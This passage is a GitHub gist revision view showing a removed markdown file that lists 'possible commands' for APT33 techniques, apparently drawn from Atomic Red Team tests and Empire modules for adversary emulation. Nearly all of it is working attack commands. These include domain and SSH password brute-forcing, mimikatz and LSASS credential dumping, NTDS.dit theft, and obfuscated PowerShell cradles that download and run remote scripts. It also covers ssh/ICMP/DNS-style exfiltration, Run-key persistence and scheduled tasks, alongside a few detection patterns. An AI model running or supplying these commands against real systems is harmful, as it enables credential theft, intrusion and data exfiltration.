Skip to content

Instantly share code, notes, and snippets.

@MSAdministrator

MSAdministrator/iranian_apit_groups_possible_commands.md

Last active December 5, 2025 00:25
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save MSAdministrator/7a61025263e279a740835da4b205e6d0 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save MSAdministrator/7a61025263e279a740835da4b205e6d0 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. MSAdministrator revised this gist Jan 8, 2020. No changes.
  2. MSAdministrator revised this gist Jan 8, 2020. 2 changed files with 10798 additions and 628 deletions.
    628 changes: 0 additions & 628 deletions apt33_apt34_possible_commands.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1,628 +0,0 @@
    # Actor: APT33
    ## Technique Name: Brute Force
    ## Technique Commands

    ```
    net user /domain > DomainUsers.txt
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    net user /domain > DomainUsers.txt
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:YOUR_COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
    net user /domain > #{input_file_users}
    echo "Password1" >> #{input_file_passwords}
    echo "1q2w3e4r" >> #{input_file_passwords}
    echo "Password!" >> #{input_file_passwords}
    @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
    net user /domain > #{input_file_users}
    echo "Password1" >> passwords.txt
    echo "1q2w3e4r" >> passwords.txt
    echo "Password!" >> passwords.txt
    @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/get_sql_server_login_default_pw
    powershell/recon/http_login
    powershell/recon/http_login
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbautobrute
    powershell/situational_awareness/network/smbscanner
    powershell/situational_awareness/network/smbscanner
    Shell
    root @ icbc: / hacker / mima # hydra -l root -P passwd.txt ssh: //192.168.159.132 -V
    Hydra v9.0 (c) 2019 by van Hauser / THC - Please do not use in military or secret service organizations, or for illegal purposes.
    auth.log
    Log
    Failed password for root from 192.168.159.129 port 43728 ssh2
    audit.log
    Log
    type = USER_AUTH msg = audit (1572163129.581: 316): pid = 2165 uid = 0 auid = 4294967295 ses = 4294967295 msg = 'op = PAM: authentication acct = "root" exe = "/ usr / sbin / sshd" hostname = 192.168 .159.129 addr = 192.168.159.129 terminal = ssh res = failed '
    ```

    # Actor: APT33
    ## Technique Name: Commonly Used Port
    ## Technique Commands

    ```
    !=powershell.exe
    nslookup
    !=cmd.exe
    nslookup
    powershell/lateral_movement/invoke_sshcommand
    powershell/lateral_movement/invoke_sshcommand
    ```

    # Actor: APT33
    ## Technique Name: Credential Dumping
    ## Technique Commands

    ```
    hashdump
    mimikatz !lsadump::sam
    hashdump
    run hashdump
    run smart_hashdump
    post/windows/gather/credentials/domain_hashdump
    logonpasswords
    mimikatz !sekurlsa::logonpasswords
    mimikatz !sekurlsa::msv
    mimikatz !sekurlsa::kerberos
    mimikatz !sekurlsa::wdigest
    use mimikatz
    wdigest
    msv
    kerberos
    logonpasswords
    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
    gsecdump -a
    wce -o output.txt
    reg save HKLM\sam sam
    reg save HKLM\system system
    reg save HKLM\security security
    procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
    ntdsutil "ac i ntds" "ifm" "create full C:\Atomic_Red_Team" q q
    vssadmin.exe create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
    findstr /S cpassword %logonserver%\sysvol\*.xml
    . $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
    Get-GPPPassword -Verbose
    ntdsutil.exe
    \\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security
    \\Windows\\.+\\bcryptprimitives.dll|\\Windows\\.+\\bcrypt.dll|\\Windows\\.+\\ncrypt.dll
    powershell/collection/ChromeDump
    powershell/collection/ChromeDump
    powershell/collection/FoxDump
    powershell/collection/FoxDump
    powershell/collection/ninjacopy
    powershell/collection/ninjacopy
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/keethief
    powershell/collection/vaults/keethief
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/credentials/enum_cred_store
    powershell/credentials/enum_cred_store
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/powerdump
    powershell/credentials/powerdump
    powershell/credentials/vault_credential
    powershell/credentials/vault_credential
    powershell/management/downgrade_account
    powershell/management/downgrade_account
    powershell/management/wdigest_downgrade
    powershell/management/wdigest_downgrade
    powershell/privesc/gpp
    powershell/privesc/gpp
    powershell/privesc/mcafee_sitelist
    powershell/privesc/mcafee_sitelist
    python/collection/linux/hashdump
    python/collection/linux/hashdump
    python/collection/linux/mimipenguin
    python/collection/linux/mimipenguin
    python/collection/osx/hashdump
    python/collection/osx/hashdump
    python/collection/osx/kerberosdump
    python/collection/osx/kerberosdump
    python/management/multi/kerberos_inject
    python/management/multi/kerberos_inject
    python/situational_awareness/network/dcos/etcd_crawler
    python/situational_awareness/network/dcos/etcd_crawler
    ```

    # Actor: APT33
    ## Technique Name: Data Compressed
    ## Technique Commands

    ```
    dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    rar a -r #{output_file} #{input_path} *.txt
    rar a -r %USERPROFILE%\data.rar #{input_path} *.txt
    rar a -r #{output_file} %USERPROFILE% *#{file_extension}
    zip $HOME/data.zip #{input_files}
    zip $HOME/data.zip $HOME/*.txt
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    tar -cvzf $HOME/data.tar.gz #{input_file_folder}
    tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
    rar.exe
    powershell/management/zipfolder
    powershell/management/zipfolder
    ```

    # Actor: APT33
    ## Technique Name: Data Encoding
    ## Technique Commands

    ```
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.#{destination_url}
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.redcanary.com
    ```

    # Actor: APT33
    ## Technique Name: Exfiltration Over Alternative Protocol
    ## Technique Commands

    ```
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    powershell/exfiltration/exfil_dropbox
    powershell/exfiltration/exfil_dropbox
    exfiltration/Invoke_ExfilDataToGitHub
    exfiltration/Invoke_ExfilDataToGitHub
    ```

    # Actor: APT33
    ## Technique Name: Exploitation for Privilege Escalation
    ## Technique Commands

    ```
    getsystem
    getsystem
    bitsadmin.exe
    msbuild.exe *MSBuildShell.csproj
    powershell/privesc/ms16-032
    powershell/privesc/ms16-032
    powershell/privesc/tater
    powershell/privesc/tater
    powershell/privesc/ms16-135
    powershell/privesc/ms16-135
    ```

    # Actor: APT33
    ## Technique Name: Network Sniffing
    ## Technique Commands

    ```
    tcpdump -c 5 -nnni ens33
    tshark -c 5 -i ens33
    tcpdump -c 5 -nnni en0A
    tshark -c 5 -i en0A
    "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    c:\windump.exe
    & "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    & c:\windump.exe
    powershell/collection/packet_capture
    powershell/collection/packet_capture
    python/collection/linux/sniffer
    python/collection/linux/sniffer
    python/collection/osx/sniffer
    python/collection/osx/sniffer
    ```

    # Actor: APT33
    ## Technique Name: Obfuscated Files or Information
    ## Technique Commands

    ```
    sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
    cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
    chmod +x /tmp/art.sh
    /tmp/art.sh
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    powershell.exe -EncodedCommand $EncodedCommand
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))"
    [a-z0-9]{1}.exe
    *.exe \*.exe\:Zone.Identifier:$DATA"
    ```

    # Actor: APT33
    ## Technique Name: PowerShell
    ## Technique Commands

    ```
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
    Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
    $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
    Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name 'atomic_user' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    New-LocalUser -FullName 'Atomic Red Team' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');$Xml.command.a.execute | IEX"
    "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
    # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
    reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
    iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
    powershell.exe -version 2 -Command Write-Host $PSVersion
    Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
    $streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
    Invoke-Expression $streamcommand
    excel.exe
    cmd.exe
    powershell.exe
    excel.exe
    powershell.exe
    mshta.exe
    cmd.exe
    powershell.exe
    mshta.exe
    powershell.exe
    powerpoint.exe
    cmd.exe
    powershell.exe
    powerpoint.exe
    powershell.exe
    powershell.exe webClient.DownloadString(
    powershell.exe webClient.DownloadFile
    powershell.exe webClient.DownloadData
    winword.exe
    powershell.exe
    hidden|-enc|-NonI\\Windows\\.+\\WindowsPowerShell\\.+\\powershell.exe
    powershell/lateral_movement/invoke_psremoting
    powershell/lateral_movement/invoke_psremoting
    powershell/management/spawn
    powershell/management/spawn
    python/management/multi/spawn
    python/management/multi/spawn
    ```

    # Actor: APT33
    ## Technique Name: Registry Run Keys / Startup Folder
    ## Technique Commands

    ```
    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
    $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
    set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
    Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    \Microsoft\Windows\Start Menu\Programs\Startup|Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Microsoft\Windows\Start Menu\Programs\Startup
    \Microsoft\Windows\Start Menu\Programs\Startup\Microsoft\Windows\Start Menu\Programs\Startup
    powershell/persistence/elevated/registry
    powershell/persistence/elevated/registry
    powershell/persistence/userland/registry
    powershell/persistence/userland/registry
    ```

    # Actor: APT33
    ## Technique Name: Remote File Copy
    ## Technique Commands

    ```
    rsync -r #{local_path} victim@#{remote_host}:#{remote_path}
    rsync -r /tmp/adversary-rsync/ victim@#{remote_host}:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:/tmp/victim-files
    rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}
    rsync -r adversary@#{remote_host}:#{remote_path} /tmp/victim-files
    rsync -r #{username}@adversary-host:#{remote_path} #{local_path}
    rsync -r #{username}@adversary-host:/tmp/adversary-rsync/ #{local_path}
    scp #{local_file} victim@#{remote_host}:#{remote_path}
    scp /tmp/adversary-scp victim@#{remote_host}:#{remote_path}
    scp #{local_file} #{username}@victim-host:#{remote_path}
    scp #{local_file} #{username}@victim-host:/tmp/victim-files/
    scp adversary@#{remote_host}:#{remote_file} #{local_path}
    scp adversary@#{remote_host}:/tmp/adversary-scp #{local_path}
    scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    scp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
    sftp victim@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'
    sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'
    sftp #{username}@victim-host:/tmp/victim-files/ <<< $'put #{local_file}'
    sftp adversary@#{remote_host}:#{remote_file} #{local_path}
    sftp adversary@#{remote_host}:/tmp/adversary-sftp #{local_path}
    sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    sftp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt
    cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f #{remote_file}
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} Atomic-license.txt
    C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}
    (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "Atomic-license.txt")
    (New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "Atomic-license.txt")
    ```

    # Actor: APT33
    ## Technique Name: Scheduled Task
    ## Technique Commands

    ```
    schtasks [/s HOSTNAME]
    shell schtasks
    Creating a scheduled task:
    schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    net start schedule
    sc config schedule start= auto
    Creating a scheduled task:
    shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    shell net start schedule
    shell sc config schedule start= auto
    at 13:20 /interactive cmd
    SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    SCHTASKS /Create /S localhost /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    $Action = New-ScheduledTaskAction -Execute "calc.exe"
    $Trigger = New-ScheduledTaskTrigger -AtLogon
    $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
    $Set = New-ScheduledTaskSettingsSet
    $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
    Register-ScheduledTask AtomicTask -InputObject $object
    schtask.exe /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
    schtask.exe /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
    at.exe ##:## /interactive cmd
    at.exe \\[computername|IP] ##:## c:\temp\evil.bat
    net.exe use \\[computername|IP] /user:DOMAIN\username password
    net.exe time \\[computername|IP]
    schtasks.exe /create * appdata
    \\Windows\\.+\\at.exe
    /Create\\Windows\\.+\\schtasks.exe
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/persistence/elevated/schtasks
    powershell/persistence/elevated/schtasks
    powershell/persistence/userland/schtasks
    powershell/persistence/userland/schtasks
    ```

    # Actor: APT33
    ## Technique Name: Standard Application Layer Protocol
    ## Technique Commands

    ```
    Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).example.com" -QuickTimeout}
